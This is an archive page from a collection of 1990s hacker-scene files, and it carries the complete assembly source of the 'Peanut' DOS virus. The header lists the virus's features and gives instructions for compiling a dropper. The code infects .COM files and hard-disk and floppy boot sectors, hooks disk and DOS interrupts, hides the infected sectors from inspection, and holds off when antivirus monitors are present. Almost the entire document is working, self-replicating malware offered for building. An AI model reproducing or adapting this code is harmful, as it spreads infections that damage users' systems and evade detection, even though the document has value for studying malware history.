Collection of Hack-Phreak Scene Programs

home *** CD-ROM | disk | FTP | other *** search

/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / SOURCE.ZIP / SOURCE.ZIP / PEANUT.A86 < prev

Wrap

Text File | 1995-01-01 | 20KB | 403 lines

;============================================================================= ; Virus Name: Peanut ; Effective Length: 443 Bytes ; ; Notes: ; - resident, stealth, multipartite, appending .COM infector ; - infects .COM files when they are executed ; - preserves host file's date/time stamp ; - I/O error messages trapped by virus int24 handler ; - infects fixed disk MBR ; - post-infection MBR write protection ; - infects boot sectors of all floppy formats on all drives ; - MBR/floppy boot sector stealth ; - boot sector infection not attempted when any TSR A-V ; monitor is present ; - virus fits into a single boot or MBR sector ; - no harmful payload ; ; To Compile: ; - use shareware A86 assembler ; - type "a86 peanut.a86" ; - resulting file peanut.com is virus dropper which, ; if executed, will infect your system with Peanut ;============================================================================= boot equ 0108 ;delta offset for boot location com equ 0104 ;delta offset for resident location viruslength equ 01bb ;virus length = 443 bytes peanut: db 'M' ;infection tag at beginning of file jmp start ;jump to virus code COM_bytes db 0cd, 020 ;COM file's original dw ? ; first four bytes start: call relative ;call for offset determination ;----------------------------------------------------------------------------- ; Relative - determines whether virus is executing from file or at boot time ; by checking segment registers, all of which will be set to the same value if ; the virus code is executing from a .COM file host. ;----------------------------------------------------------------------------- relative: pop bp ;pop offset off of stack push cs pop ax ;set ax=cs push ss pop bx ;set bx=ss cmp ax,bx ;cs=ss? jne boot_time ;if not, must be executing at boot ; time, so jump to boot routine ;----------------------------------------------------------------------------- ; File_time - infects fixed disk Master Boot Record (MBR) if not already ; infected, restores host .COM file's first four bytes at beginning of file, ; and jumps to execute host. ;----------------------------------------------------------------------------- file_time: lea bx,[bp+viruslength-03] ;set load offset just beyond program lea si,[bp-03] ;set source offset to start of virus call infect_MBR ;check/infect MBR mov di,0100 ;COM file entry point & move dest. push di ;save on stack as return offset lea si,[bp-07] ;point to stored COM 1st four bytes movsw ;move the original four bytes movsw ; back to the start of the COM file ret ;return to execute the COM file ; (return segment already on stack) ;----------------------------------------------------------------------------- ; Boot_time - infects MBR if not already infected, steals int13, installs ; virus in memory. ;----------------------------------------------------------------------------- boot_time: xor ax,ax ;zero ax mov ds,ax ;point ds to vector table mov si,07c00 ;set source offset for virus move cli ;disable interrupts mov ss,ax ;set stack segment mov sp,si ;set stack pointer sti ;enable interrupts push ds ;save segment for int13 theft push si ;save load offset for original MBR push ds ;save load segment for original MBR dec word ptr [0413] ;decrease conventional memory by 1KB int 012 ;load ax with #KB of conv. memory mov cx,0106 ;set shift (cl) and move count (cx) shl ax,cl ;calculate destination segment mov es,ax ;set es to destination segment cmp dl,080 ;booting from drive "C"? je steal_int13 ;if so, keep si=07c00 add si,03e ;otherwise, change si to floppy offset ; of viral code steal_int13: xchg [013*4+2],ax ;point int13 vector to virus segment mov [si+offset old13-boot+2],ax ;store old int13 segment value mov ax,offset chain-com ;load ax with offset of chain to int13 xchg [013*4],ax ;point int13 vector to virus offset mov [si+offset old13-boot],ax ;store old int13 offset value mov di,04 ;set destination offset=0004 push di ;save it for later use as source off. cld ;clear direction flag (fwd) rep movsw ;move virus to top of conv. memory push es ;push destination segment for retf mov ax,offset top_mem-com ;load bx with offset push ax ;push offset for retf retf ;return to self at new location top_mem: pop si ;set si to source offset of virus pop es ;pop es=0000 as disk load segment pop bx ;set bx=07c00 as disk load offset push cs pop ds ;set ds to source segment of virus call infect_MBR ;check/infect MBR and load original pop ds ;point to vector table segment mov word ptr [013*4],offset int13-com ;enable virus int13 handler jmp 0000:07c00 ;jump to execute original MBR ;----------------------------------------------------------------------------- ; Infect_MBR - infects MBR if not already infected. ;----------------------------------------------------------------------------- infect_MBR: mov ax,0201 ;read-one-sector function mov cx,01 ;cylinder 0, sector 1 (MBR) mov dx,080 ;head 0, drive "C" int 013 ;load MBR jc exit_MBR ;if flag=error, exit cmp byte ptr es:[bx],0e8 ;check for peanut virus code je exit_MBR ;if equal, MBR already infected, so ; exit mov ax,0301 ;write-one-sector function inc cx ;cylinder 0, sector 2 int 013 ;relocate original MBR to sector 2 mov di,bx ;set dest. offset to MBR in buffer mov cx,viruslength-04 ;load move count to cx cld ;clear direction flag (fwd) rep movsb ;move virus to MBR in memory mov ax,0301 ;write-one-sector function inc cx ;cylinder 0, sector 1 (MBR) int 013 ;write infected MBR to drive "C" exit_MBR: mov ax,0201 ;read-one-sector function inc cx ;cylinder 0, sector 2 (original MBR) int 013 ;load MBR for possible execution (if ; boot-time) ret ;----------------------------------------------------------------------------- ; INT13 Handler - steals int21 upon execution of first .EXE file to avoid ; problems on systems which load DOS high, provides MBR stealth/write protect, ; infects floppies except when TSR A-V monitoring program is present and ; provides floppy stealth by zeroing out the virus code in the disk I/O buffer ; containing the infected boot sector. Original floppy boot sector is not ; relocated, system simply boots from hard drive after boot from an infected ; floppy. This is VERY easy to miss if the boot from floppy is unintentional, ; as it usually is. ;----------------------------------------------------------------------------- int13: push ds ;preserve registers push ax xor ax,ax ;zero ax mov ds,ax ;point ds to vector table cmp word ptr es:[bx],'ZM' ;EXE file being accessed? jne MBR_stealth ;if not, don't steal int21 yet cmp [0b9*4+2],ax ;bypass flag set (intb9 segment <> 00)? jne MBR_stealth ;if so, don't steal int21 vector again mov ax,cs ;set ax=cs xchg [021*4+2],ax ;point int21 vector to virus segment mov [0b9*4+2],ax ;point unused vector to DOS int21 mov cs:[offset old21-com+2],ax ;store original segment in virus mov ax,offset int21-com ;load ax with virus int21 handler off. xchg [021*4],ax ;point int21 vector to virus offset mov [0b9*4],ax ;point unused vector to DOS int21 mov cs:[offset old21-com],ax ;store original offset in virus MBR_stealth: pop ax ;restore ax cmp cx,01 ;cylinder 0, sector 1? jne exit_int13 ;if not, no need for stealth, so exit cmp dx,080 ;head 0, drive "C"? ja exit_int13 ;if above, not accessing drive "C" MBR jb infect_floppy ;if below, must be floppy access cmp ah,03 ;write request? je sim_IO ;if so, simulate write inc cx ;point to original MBR (sector 2) call bios_int13 ;load it to buffer dec cx ;restore cx to original value (1) sim_IO: xor ah,ah ;set ah=0 to simulate success clc ;clear carry flag for same read_fail: pop ds ;restore ds retf 02 ;return to calling routine infect_floppy: cmp ah,02 ;read request? jne exit_int13 ;if not, exit call bios_int13 ;read boot record jc read_fail ;if flag=fail, exit mov es:[bx],03ceb ;write "jmp" (over BPB) at start of ; boot record in buffer push si ;preserve registers push di mov si,04 ;set virus source offset for move lea di,[bx+03e] ;set destination offset to beyond BPB mov cx,viruslength-04 ;set move count cmp byte ptr [040*4+3],0c0 ;int40 pointing to ROM? push cs pop ds ;set ds=cs jb floppy_stealth ;if int40 not pointing to ROM, A-V ; monitor is present, do not infect push di ;save these for push cx ; later use cld ;clear direction flag (fwd) rep movsb ;infect boot record in buffer mov ax,0301 ;write-one-sector function inc cx ;track 0, sector 1 call bios_int13 ;write infected boot record pop cx ;restore move count pop di ; and destination offset floppy_stealth: xor ax,ax ;set al to dummy byte (00) rep stosb ;overwrite virus code in boot record ; buffer (for stealth) inc ax ;restore ax to original value (1) inc cx ;restore cx to original value (1) pop di ;restore registers pop si jmp sim_IO ;return sanitized boot record to ; calling routine exit_int13: pop ds ;restore ds chain db 0ea ;"jmp far" to location specified in ; old13 old13 dw ?, ? ;offset and segment of original int13 ; handler bios_int13: pushf cs: call dword ptr [offset old13-com] ;call original int13 ret ;----------------------------------------------------------------------------- ; INT24 Critical Error "Handler" - hides floppy write-protect errors during ; file infection attempts. ;----------------------------------------------------------------------------- int24: mov al,03 ;set al to fail disk I/O errors iret ;----------------------------------------------------------------------------- ; INT21 Handler - infects COM files when executed, retains file date/time. ;----------------------------------------------------------------------------- file_IO1: mov ah,042 ;move file pointer function cwd ;set dx=0000 (LSP) file_IO2: xor cx,cx ;set cx=0000 (MSP) int 0b9 ;int21 (set file pointer [FP] to BOF) mov cl,04 ;set file read/write count xchg si,ax ;store FP (IO1 call) or handle (IO2) mov ah,040 ;write to file w/handle function xor di,di ;read/write destination offset ret int21: cmp ax,04B00 ;execute file request? jne exit_int21 ;if not, exit push ax ;preserve registers push bx push dx push ds push es mov ax,03D02 ;open file read/write and get handle call file_IO2 ;int21 jc open_fail ;if file attrib. not read/write, exit mov ax,03524 ;get int24 vector function int 0b9 ;int21 push es ;save original int24 segment push bx ; and offset mov ax,05700 ;get file date/time function mov bx,si ;move handle to bx int 0b9 ;int21 push cx ;save original file time push dx ; and date push cs pop ds ;set ds=cs push cs pop es ;set es=cs mov ax,02524 ;set int24 vector function mov dx,offset int24-com ;set dx to offset of our int24 handler call file_IO2 ;int21 (steal int24) mov ah,03F ;read file w/handle function cwd ;set pointer to buffer offset (0) int 0b9 ;int21 (read file's 1st four bytes) mov al,'M' ;set al=infection tag scasb ;check file's first byte for tag je close_file ;if equal, already infected or ; EXE file mov al,02 ;move FP, offset (0) from EOF call file_IO1 ;int21 (reset FP to EOF) mov cx,viruslength ;set write count to virus length int 0b9 ;int21 (write virus to EOF) jc close_file ;if failed, exit mov ax,0E94D ;"jmp" and "M" infection tag stosw ;write to disk I/O buffer area xchg ax,si ;set ax=FP stosw ;write jump offset to I/O buffer area xchg dx,ax ;set al=00 (FP offset (0) from BOF) call file_IO1 ;set FP to BOF int 0b9 ;int21 (write I/O buffer contents ; to BOF) close_file: pop dx ;get original file date pop cx ; and time mov ax,05701 ;set file date/time function int 0b9 ;int21 mov ah,03E ;close file w/handle function int 0b9 ;int21 pop dx ;get original int24 vector offset pop ds ; and segment mov ax,02524 ;set int24 vector function int 0b9 ;int21 open_fail: pop es ;restore registers pop ds pop dx pop bx pop ax exit_int21: db 0ea ;"jmp far" to location specified in ; old21 old21 dw ?, ? ;offset and segment of original int21 end peanut